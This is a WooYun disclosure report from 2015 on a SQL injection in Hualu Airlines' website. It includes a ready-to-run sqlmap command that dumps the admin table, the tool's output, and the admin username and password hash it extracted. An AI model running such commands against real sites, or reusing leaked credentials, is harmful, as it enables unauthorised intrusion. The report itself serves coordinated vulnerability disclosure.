航空安全之华鲁航空主站存在SQL注射漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154273

漏洞标题：航空安全之华鲁航空主站存在SQL注射漏洞

漏洞作者：路人甲

提交时间：2015-11-19 13:39

修复时间：2016-01-11 15:34

公开时间：2016-01-11 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-19：细节已通知厂商并且等待厂商处理中
2015-11-24：厂商已经确认，细节仅向厂商公开
2015-12-04：细节向核心白帽子及相关领域专家公开
2015-12-14：细节向普通白帽子公开
2015-12-24：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

华鲁航空华鲁航空是涉足航空客货运、航空票务、航空专业人才培养、文化传媒、房产、装饰、宾馆酒店、商贸等领域的一所综合性股份制机构。直属部门有：华之鲁航空服务有限公司、华鲁航空专业学校、华鲁航空呼叫中心、华鲁航空培训中心、华鲁航空接待中心、华鲁航空配餐中心、鲁航文化传媒、鲁航房产、鲁航装饰、鲁航商贸，目前并在甘肃兰州、山西长治、河北沧州、广东珠海、山东济南、日照、菏泽、寿光等全国十一个省市地区设有分公司或办事处及航空售票厅。

详细说明：

地址：http://**.**.**.**/readnews.asp?id=2233

python sqlmap.py -u "http://**.**.**.**/readnews.asp?id=2233" -p id --technique=B --random-agent --batch --threads=10 -T admin -C id,logins,username,userpwd --dump

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2233 AND 3314=3314
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
current user:	None
current user is DBA:	None
Database: Microsoft_Access_masterdb
+--------+---------+
| Table  | Entries |
+--------+---------+
| news   | 2084    |
| type   | 10      |
| admin  | 1       |
| system | 1       |
+--------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2233 AND 3314=3314
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | numeric     |
| logins   | numeric     |
| power    | numeric     |
| username | non-numeric |
| userpwd  | non-numeric |
+----------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2233 AND 3314=3314
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[1 entry]
+----+-------+--------+----------+------------------+
| id | power | logins | username | userpwd          |
+----+-------+--------+----------+------------------+
| 1  | 5     | 758    | admin    | 25faaecd9b518cb3 |
+----+-------+--------+----------+------------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-11-24 16:01

厂商回复：

CNVD未直接复现所述情况，已经转由CNCERT下发给山东分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154273

漏洞标题：航空安全之华鲁航空主站存在SQL注射漏洞

相关厂商：华鲁航空

漏洞作者：路人甲

提交时间：2015-11-19 13:39

修复时间：2016-01-11 15:34

公开时间：2016-01-11 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154273

漏洞标题：航空安全之华鲁航空主站存在SQL注射漏洞

相关厂商：华鲁航空

漏洞作者： 路人甲

提交时间：2015-11-19 13:39

修复时间：2016-01-11 15:34

公开时间：2016-01-11 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154273"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云